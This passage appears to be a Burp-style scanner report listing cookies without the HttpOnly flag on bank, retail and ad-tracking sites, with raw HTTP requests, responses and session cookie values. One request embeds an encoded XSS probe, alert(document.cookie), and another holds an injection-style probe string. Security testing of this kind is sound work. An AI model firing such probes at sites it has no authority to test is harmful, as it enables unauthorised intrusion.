BASE=YnQI/8MmSf+Tkd8dWtaeW84rjjGaJlmvQDh5gB4INGhgqyeE2hX/3YWcFU+yQrMIvnyW7WqTRB0KmqQ/Bw31Ai99Olekp3KbTCY6Hcz3dkGhJ9sRouHZQnZFf264SgioQ63Tlv7fQeZ/MdF9vTkG04AAgW50nlreFyoGRSpu37msX+jQLx6DVzg0GiS7C+fmMlpM6WkfUJE/jZpxX9BVxb4NY6Bt+8HJjfPTnrX+YEI5U8ZjkNfo+ItYJvKGpR4RUa0dXReYyzQpxRA2o3puqGCbuiUAjLdfLbZkb0ehAjiNHPbW7aQ/l8C1FAzyv+l6iXS0VVSgNUKupn3qdes1byPz6HZxkJMDmZdPvgtllPoBe0tFpazRzM6rSRksfxhrPz5M5pJJtm/KXQNQ7rIa/ZcvMwjSuOO0V4u4UyiBOr868nAkimb4kuiPI6EuPQQEioI0acaoq0TOTxGN1Dyc8slydSMH9KF18QKVsBUXOKbwTDzUKPzbf4wBORYCjhMJH19G+54N1ZyXnV1z4b4OfC5tdEiBbtwwGNupEAetICCpOvL!; ROLL=v5Q2W0MtUuzqOtGriBc3MVD!
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 21:59:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Set-Cookie: C2=ZPdSNJpwHg02FezBdbdh3cwUwX4NH8Y4FezBYTeh3cQ3gZ4NHQTnGezBF2ph3cAohX4NHYZ4FezBKGeh3cwohX4NHca4FezBiGeh3cQshX4NwOIAM/oROI7YBwAoGXzr1NQcKa8GGKmAI9YRVN53DkL3FyxgPTw6TVIQsuWB/0mBOca7FIaWGserMWw41ZE+kqlB6bjB4p6bCwWZGX5r4fQsMawEwa3BW8oBT0I9HsfzFSxsNeQQoa4Ns2zB1xmRK6KzIUyhGAH; domain=advertising.com; expires=Fri, 01-Feb-2013 21:59:53 GMT; path=/ Set-Cookie: GUID=MTI5NjY4Mzk5MzsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; domain=advertising.com; expires=Fri, 01-Feb-2013 21:59:53 GMT; path=/ Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/ Cache-Control: private, max-age=3600 Expires: Wed, 02 Feb 2011 22:59:53 GMT Content-Type: image/gif Content-Length: 49
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /maps HTTP/1.1 Host: maps.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /maps/place HTTP/1.1 Host: maps.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /set_beta HTTP/1.1 Host: maps.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 01:03:15 GMT Set-Cookie: B=3eaqqlp6kjvmj&b=3&s=bk; expires=Tue, 02-Jun-2037 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 3344
<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head><title>Yahoo! - 404 Not Found</title><style> /* nn4 hide */ /*/*/ body {font:small/1.2em arial,h ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cgi-bin/ifsewwwc?Logon HTTP/1.1 Host: myaccounts.navyfcu.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /signon HTTP/1.1 Host: online.wellsfargo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Server: KONICHIWA/1.0 Date: Wed, 02 Feb 2011 22:02:13 GMT Cache-Control: no-cache="set-cookie" X-Cnection: close Location: https://online.wellsfargo.com/login?LOB=BIZ&ERROR_CODE=ZXJyb3IuY29va2llc05vdEVuYWJsZWQ%3D X-Powered-By: Servlet/2.4 JSP/2.0 Set-Cookie: OB_SO_ORIGIN=source=alternate;path=/;domain=.wellsfargo.com; Set-Cookie: ISD_DAS_COOKIE=Zwt2abN8dLgwD7E5lQAAAAAAA5lwAI7oMlzo4nNgjH5Nn3E7KNFroc2SxeqP8qV8CZgGCvTIC19wEM8=;path=/;domain=.wellsfargo.com; Connection: close
<html><head><title>302 Moved Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="https://online.wellsfargo.com/logi ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /auth/AuthService HTTP/1.1 Host: onlineservices.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:02:13 GMT Server: IBM_HTTP_Server Set-Cookie: TLTSID=16FB92962F18102F5856F16EF5F79C09; Path=/; Domain=.wachovia.com Cache-Control: no-store Pragma: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: AuthSvsSessionID=IzW+wP+VVHuq0l/F/NqxgmwCKP0=55 4N.LEInmgXLF30lFrJTXIXXWgrr.1012025; HttpOnly; Path=/; Domain=.wachovia.com; Secure x-frames-option: deny Connection: close Content-Type: text/html Content-Language: en Content-Length: 13099
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!--
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pixel;r=321886802;fpan=1;fpa=P0-629275191-1296696399668;ns=0;url=http%3A%2F%2Fthehill.com%2Fblogs%2Fe2-wire%2F677-e2-wire650aa'%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E2295b33377e%2F137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more;ref=http%3A%2F%2Fburp%2Fshow%2F31;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1296696399666;tzo=360;a=p-51dZx4IkAE4Zk HTTP/1.1 Host: pixel.quantserve.com Proxy-Connection: keep-alive Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mc=4d21fad0-365c5-43e3d-97d7a; d=EBEAG6ANq0itiBDbz6HJXbIAAb8BAfoFgfUAmtGkrxPyD5HhvB0s5SBu0fLChB0bohjR4QCEgaMMF9oYHPbyDhAA0Q4QKNGT_jg5INQohIFADybhCxjCsdeDCxpRseEAKhHyAiABcoSCVegsEDsjg7EeGaIQ
Response
HTTP/1.1 204 No Content Connection: close Set-Cookie: d=EHUAG6ANq0itiBDbz6HJXbIAAbsBAfsFgZYAmtGkrxPyD5HhvB0s5SBu0fLChB0bohjR4QCEgaMKwQz28g4QANEOECjRk_44OSDUKISBQA8m4QsYwrHXgwsaUbHhACoR8gIgAXKEglXoLBA7I4OxHhmiEA; expires=Wed, 04-May-2011 01:26:00 GMT; path=/; domain=.quantserve.com P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV" Cache-Control: private, no-cache, no-store, proxy-revalidate Pragma: no-cache Expires: Fri, 04 Aug 1978 12:00:00 GMT Date: Thu, 03 Feb 2011 01:26:00 GMT Server: QS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /paynow/ HTTP/1.1 Host: promo.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /r/beacon?b2=gX2iQOUxtnHmRU47KaHireBgXSml7iqTWpMq6sC-bkfBLD_8Bpm0tGlg0hKb4nkI99t0_v7dGOPLnScMot5haQ&cid= HTTP/1.1 Host: r.turn.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1791096;type=citi08ft;cat=homechar;ord=1;num=7738084758166.224? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uid=3011330574290390485; adImpCount=oh0PP3N04fRnBd11giaMRn0GaIuFFc6KU0t95Ihox42Y481wEkFtGX7HudJA1SwJCBsZxoRT6EzfAaBOxC9wKTt4volhK1SKMMEXrRaSQRZi9OYrtG-b0iAWL5Sg__z6Mu5dojwn5g9wbHIYb9itxx7GYSyR957eDlUpeFx78rhPAxXzEzYUFqdsvXkuFIOa3SJBwxhTK9UwlXAscYO_M4PWvpR2lvg2CTziw80-4erd7x2ac5D5zjijBHgETImH6J7mzrOj8gbZmvqalfHq1zOWaaEkLYgoCjpzZqrIOb4Fr-22QJE64x-hU4KLgyMywYPBSo2jlvAF8lq_IygKlasFwtDx2lJttCmO3ikXUoRriPGYYJIwMnnp0drU0iPKrDDCOXkqJdp6fs-m5LFp06AT3l7X8Fu562OsS_bZq3w-94h_yPZdjrrVWBfP28qvw5g9aOhI5RNPyE9rahUCbt3lzlA6-E_XLXUwKlz8M8Rge-axmvL7QRbbVTcWH_69gNe7Lp99y-WLm2CQwebhsP78DoTX-MltELREBCeeahldH37m3WrGWRs0rxyrhTIvfNDSBptsBfTCIkNpNIZ-estuyxh9bLEhi_2rYF-v3jU-PyGR7zYZKkURVc4VktqypCu6kLg-kmXa4JYXwL5SDme2jKGznyNxnorhkYhuuyfTrtrFY_vsI0N2lko9YuVLMugtX4JGvQuQNrdCkfnoNLQy3HrDk_mqO0a-EdfNtHhVS8ISxl2FC-QxoYM1dFQriDP20OwUBwmVn04CK7SdmOrNneCQeM0Mtq9X6LYgOadpuC766m5RMjVQV9XDrztlefh7m2CDoV_VGAxZRTmH65-iEOjj626Xr9a4PyPR4yMPDZSQiR8N05VXl8Kl5CF5wYPBSo2jlvAF8lq_IygKlQ4AcvxicaQ0QJv3A-NEwrP_vYlQQcTfv4G9VvPeZUwSrDDCOXkqJdp6fs-m5LFp05G3ZVFVoXjdVnl7Wbi3hO0-94h_yPZdjrrVWBfP28qvxkUWUDF6X3KpqQdl41aNM0RM74xthkDRQvK455LrVCLLNoiMiQCbY7XGffLYXA_SuLQTgLh8g9Qs477VuC83If78DoTX-MltELREBCeeahlgVK-gLzc7v3bufMT3ciwRPOq7W_c7yCEewncWyerLNirskINCTJZ2w2X1u_Ffr45hIaHa_H76oN5ioqf3DUNypCu6kLg-kmXa4JYXwL5SDgVZpbAYwmSs52tJ3ph4JCMa2L50HxvswuEv77HCRTvKMugtX4JGvQuQNrdCkfnoNG4mlIa-6dAvewF741vW4jhVS8ISxl2FC-QxoYM1dFQrs_FmoMnxSVp_tZOCUusIKmakJ6Zxx4MaHG4qowJX52cdsqn6EbbEHzpw1cahm_ednSAyZag0hguPHBGDv4D0F89cj7I3Xm3rPyyOvzQMcybDLE8i5ZewRD7RValSE2YFn6IQ6OPrbpev1rg_I9HjI5ynCo2hqWp8ighHIhRcz2nBg8FKjaOW8AXyWr8jKAqVscXOphesMEv_hKT95FZL-tNurEXc2b78YksLyMCs4H6sMMI5eSol2np-z6bksWnTTE9U8rPoK07OvagfeUFMTT73iH_I9l2OutVYF8_byq_c1Kq7NjC9E9a0eoW9ANcQm2_M-Vs_XiB22OkRMt9wZss2iIyJAJtjtcZ98thcD9J5TC-ggthaT5RIrPMrgXzf_vwOhNf4yW0QtEQEJ55qGc-5cVQ6I7r0sZiLYoBNLt9wJREdAQCGkjhwfIbDh8eKH3liqW8YkScefdM86sUHP_PaiF7fYodG30TCcbE3BCWkK7qQuD6SZdrglhfAvlIOyAmQVZ9Gk9LJN20oRH7d9xucJsk9KwezSI69frNhlnh-VzDUnvD0VSF9GprGKshZpvViBXcPLi1FjMYUJVEbmFVLwhLGXYUL5DGhgzV0VCtu-wgzPw8HAJyjq29STFT-1YYia3j2kAHlFsKaEZ4FVzZEDIrmol-EatT1dqZXDk0mJSx72jjc-JYaXuGhWqtrn6IQ6OPrbpev1rg_I9HjI98tK4Lkd3yYgSLJJRfeUv3Bg8FKjaOW8AXyWr8jKAqVIJgqaELa9gf4ED3OCBald8enkhYgNEwqu2cgvufAu8qsMMI5eSol2np-z6bksWnTbV-gOod-LZDuMZIGw8px0j73iH_I9l2OutVYF8_byq-eWXxP40DPBXd3KCfiOrroHIw5X3-Sh4HUjnsSaxC0epuc0uDxDHt-rTBh2e9nLtgi0gluZrsw7wDK_J5brg91_vwOhNf4yW0QtEQEJ55qGXFlxPVND7eK0NKkmYcNg9jOWDFl6Eb2AIoC5V4JNNKLUZ0sucMJLd08lMBqbvDIPaQ9DijJjsm5f6UC3GKLnVdkeGy8tt3_Zt_zWHCziuKg5syEq3UFt31YVe3zZxRiTrPsbMN1vS3TFG_DmRWjBGoobKMAs1_SjcmCMyMVnnvXgJ4GX4OjUVNjX2CulbPhbYCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgeS-Ii0cHw18f8N_OREqrYbydaelxbY-p8EgzRBPnFKG8nWnpcW2PqfBIM0QT5xShvJ1p6XFtj6nwSDNEE-cUtG5oMP1xzBs04f9aYcpef_h-9zvu-4SLKmRwnyZzNBL4fvc77vuEiypkcJ8mczQS-H73O-77hIsqZHCfJnM0EtFERdyopXzmQlD9vlwvmYOVcj84RfJT-7cTVPiV9xkT9uAa-_yMHADocL3iDyiyA0F0KdTVDhrtMOpab3gV8JpWhzPlVze60NJNLk_VPM-uFocz5Vc3utDSTS5P1TzPrhaHM-VXN7rQ0k0uT9U8z64YjuojwRqay5-ZAaNIzcU3yt_K6BkSAdnJ6PGav_ruqgeixqa40KlkYUwYv6ONa9cufe3IUZ5SPWBETiwrd17lbFsu3zfiF7BPBJIiLSApNR1VhafmVnk6BhX_Sepv3rucGr9Pv9WxoR207LV_JU812XpzTAYSv-BElQmRmwUjrxl6c0wGEr_gRJUJkZsFI68ZenNMBhK_4ESVCZGbBSOvL-FrFoAGy0sFOEtM5Nuv1rHf67HEvueUzrmEU5VKarK0pFHmk8ureZOA97fEANKtQvhIyyKReEJO7XhpyT2HyIL4SMsikXhCTu14ack9h8i0WpNDrvYk58e1CQBxU9aoW0GgBz7JE6lT1FzCJ5VNfptBoAc-yROpU9RcwieVTX6OyZXhK3RWfu9UgjQxzq_ZTsmV4St0Vn7vVII0Mc6v2U7JleErdFZ-71SCNDHOr9lOyZXhK3RWfu9UgjQxzq_ZVXO01XiSEZlE5C1tJgs0ioM_0RPnIuudzXDvK7K8vPFDP9ET5yLrnc1w7yuyvLzxQz_RE-ci653NcO8rsry88UM_0RPnIuudzXDvK7K8vPFdLmcsxIHfv-CcNp2nsZsDDJxgXJI7GH1VuUBYoyz48YycYFySOxh9VblAWKMs-PGv29VFO9u1uo-sTqh6dCOpkhLk4ViUsMPsWwjDbC_pXdIS5OFYlLDD7FsIw2wv6V3SEuThWJSww-xbCMNsL-ld3iOttRS0QEfXzzQ32Qakh0VYOKF3X7wdD8Dnz7l4C4j; fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; pf=V_hBBoSZrvzxwVsylnKaXvamneyvQhRVH4dyk1q1DU-JwV9kSIzX4BtZ7vBDkFqiiL8UzCzja6AU_RwAB28KJ34lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15003%7C15001%7C15001%7C15001%7C15001%7C15003%7C15003%7C14983%7C15003%7C15003; rv=1
The following cookie was issued by the application and does not have the HttpOnly flag set:
v1st=2D72E3495D74083; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.cardmemberservices.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /MyAccounts.aspx HTTP/1.1 Host: resources.cardmemberservices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: no-cache Pragma: no-cache Content-Length: 170 Content-Type: text/html; charset=utf-8 Expires: -1 Location: https://online.cardmemberservices.com/MyAccounts.aspx Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=2D72E3495D74083; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.cardmemberservices.com Date: Wed, 02 Feb 2011 22:02:19 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://online.cardmemberservices.com/MyAccounts.aspx">here</a>.</h2> </body></html>
The following cookie was issued by the application and does not have the HttpOnly flag set:
v1st=D5E5B6A166EC8299; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /MyAccounts.aspx HTTP/1.1 Host: resources.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Cache-Control: no-cache Pragma: no-cache Content-Length: 162 Content-Type: text/html; charset=utf-8 Expires: -1 Location: https://chaseonline.chase.com/MyAccounts.aspx Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=D5E5B6A166EC8299; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com Date: Wed, 02 Feb 2011 22:02:19 GMT Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://chaseonline.chase.com/MyAccounts.aspx">here</a>.</h2> </body></html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /meta HTTP/1.1 Host: s.xp1.ru4.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /meta HTTP/1.1 Host: s.xp1.ru4.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /%20%20%20%20%20%20%20%20%20%20%20%20%201','','0C HTTP/1.1 Host: search.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
AAFES=R1966950070; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /shop/ECC/Account/OlApp.aspx HTTP/1.1 Host: shop.aafes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Set-Cookie: AAFES=R1966950070; path=/ Connection: close Date: Thu, 03 Feb 2011 01:04:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Powered-By: UrlRewriter.NET 2.0.0 Location: https://shop.aafes.com/shop/Login.aspx?ReturnURL=https://shop.aafes.com/shop/ECC/Account/OlApp.aspx Set-Cookie: ASP.NET_SessionId=2n4tod55edqnia45xomyrlzq; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 216
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="https://shop.aafes.com/shop/Login.aspx?ReturnURL=https://shop.aafes.com/shop/ECC/Account/OlApp.aspx">here</a>.</h2>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dcssdhxcq00000008yjgz9rbs_9d3h/dcs.gif?&dcsdat=1296684059906&dcssip=www.citizensbank.com&dcsuri=/&WT.tz=-6&WT.bh=16&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Citizens%20Bank:%20Secure%20Online%20Banking%20%26%20Personal%20Finance%20Solutions%20|%20Citizens%20Bank&WT.js=Yes&WT.jv=1.5&WT.bs=1036x1012&WT.fi=Yes&WT.fv=10.1&WT.tv=8.0.0&WT.sp=EN&WT.cg_n=None&WT.cg_s=None&WT.ckexist=0&WT.ckimpressions=0&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vt_sid=2f09a5fcfe32cca7b8b1296687659993.1296684059993&WT.co_f=2f09a5fcfe32cca7b8b1296687659993&WT.ad=standardoverdraftpractices;mobilebanking;goaltracksavings;trufitstudentloan;circlegoldmoneymarket;greensense;collegesaver;refinance;homebuyersavings;moneyhelp HTTP/1.1 Host: statse.webtrendslive.com Proxy-Connection: keep-alive Referer: http://www.citizensbank.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNjA1MzY0MzY4LjMwMTI2NDkyAAAAAAAFAAAAtXsAAGwfLU1MHy1N4LYAANfxQk3H8UJNZuAAALAkRE2vJERNoPEAAIycRU2MnEVND6gAANjTSU3Y00lNBQAAAF4zAABsHy1NTB8tTQtFAADX8UJNx/FCTUtLAACwJERNryRETWpLAACMnEVNjJxFTcJBAADY00lN2NNJTQAAAAA-
Response
HTTP/1.1 303 Object Moved Connection: close Date: Wed, 02 Feb 2011 22:00:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /dcssdhxcq00000008yjgz9rbs_9d3h/dcs.gif?dcsredirect=112&dcstlh=0&dcstlv=0&dcsdat=1296684059906&dcssip=www.citizensbank.com&dcsuri=/&WT.tz=-6&WT.bh=16&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Citizens%20Bank:%20Secure%20Online%20Banking%20%26%20Personal%20Finance%20Solutions%20|%20Citizens%20Bank&WT.js=Yes&WT.jv=1.5&WT.bs=1036x1012&WT.fi=Yes&WT.fv=10.1&WT.tv=8.0.0&WT.sp=EN&WT.cg_n=None&WT.cg_s=None&WT.ckexist=0&WT.ckimpressions=0&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vt_sid=2f09a5fcfe32cca7b8b1296687659993.1296684059993&WT.co_f=2f09a5fcfe32cca7b8b1296687659993&WT.ad=standardoverdraftpractices;mobilebanking;goaltracksavings;trufitstudentloan;circlegoldmoneymarket;greensense;collegesaver;refinance;homebuyersavings;moneyhelp Content-Length: 0 Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNjA1MzY0MzY4LjMwMTI2NDkyAAAAAAAGAAAAtXsAAGwfLU1MHy1N4LYAANfxQk3H8UJNZuAAALAkRE2vJERNoPEAAIycRU2MnEVND6gAANjTSU3Y00lNDqgAAOPTSU3j00lNBQAAAF4zAABsHy1NTB8tTQtFAADX8UJNx/FCTUtLAACwJERNryRETWpLAACMnEVNjJxFTcJBAADj00lN2NNJTQAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dcst1s1qz00000s5jw3dagrbs_7i7l/dcs.gif?&dcsdat=1296684049096&dcssip=www.charterone.com&dcsuri=/&WT.tz=-6&WT.bh=16&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Charter%20One:%20Secure%20Online%20Banking%20%26%20Personal%20Finance%20Solutions%20|%20Charter%20One&WT.js=Yes&WT.jv=1.5&WT.bs=1036x1012&WT.fi=Yes&WT.fv=10.1&WT.tv=8.0.0&WT.sp=EN&WT.cg_n=None&WT.cg_s=None&WT.ckexist=0&WT.ckimpressions=0&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vt_sid=23b1ef31bcf943a33a31296687649101.1296684049101&WT.co_f=23b1ef31bcf943a33a31296687649101&WT.ad=standardoverdraftpractices;mobilebanking;goaltracksavings;trufitstudentloan;circlegoldmoneymarket;greensense;collegesaver;refinance;homebuyersavings;moneyhelp HTTP/1.1 Host: statse.webtrendslive.com Proxy-Connection: keep-alive Referer: http://www.charterone.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNjA1MzY0MzY4LjMwMTI2NDkyAAAAAAAEAAAAtXsAAGwfLU1MHy1N4LYAANfxQk3H8UJNZuAAALAkRE2vJERNoPEAAIycRU2MnEVNBAAAAF4zAABsHy1NTB8tTQtFAADX8UJNx/FCTUtLAACwJERNryRETWpLAACMnEVNjJxFTQAAAAA-
Response
HTTP/1.1 303 Object Moved Connection: close Date: Wed, 02 Feb 2011 21:59:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /dcst1s1qz00000s5jw3dagrbs_7i7l/dcs.gif?dcsredirect=126&dcstlh=0&dcstlv=0&dcsdat=1296684049096&dcssip=www.charterone.com&dcsuri=/&WT.tz=-6&WT.bh=16&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Charter%20One:%20Secure%20Online%20Banking%20%26%20Personal%20Finance%20Solutions%20|%20Charter%20One&WT.js=Yes&WT.jv=1.5&WT.bs=1036x1012&WT.fi=Yes&WT.fv=10.1&WT.tv=8.0.0&WT.sp=EN&WT.cg_n=None&WT.cg_s=None&WT.ckexist=0&WT.ckimpressions=0&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vt_sid=23b1ef31bcf943a33a31296687649101.1296684049101&WT.co_f=23b1ef31bcf943a33a31296687649101&WT.ad=standardoverdraftpractices;mobilebanking;goaltracksavings;trufitstudentloan;circlegoldmoneymarket;greensense;collegesaver;refinance;homebuyersavings;moneyhelp Content-Length: 0 Set-Cookie: 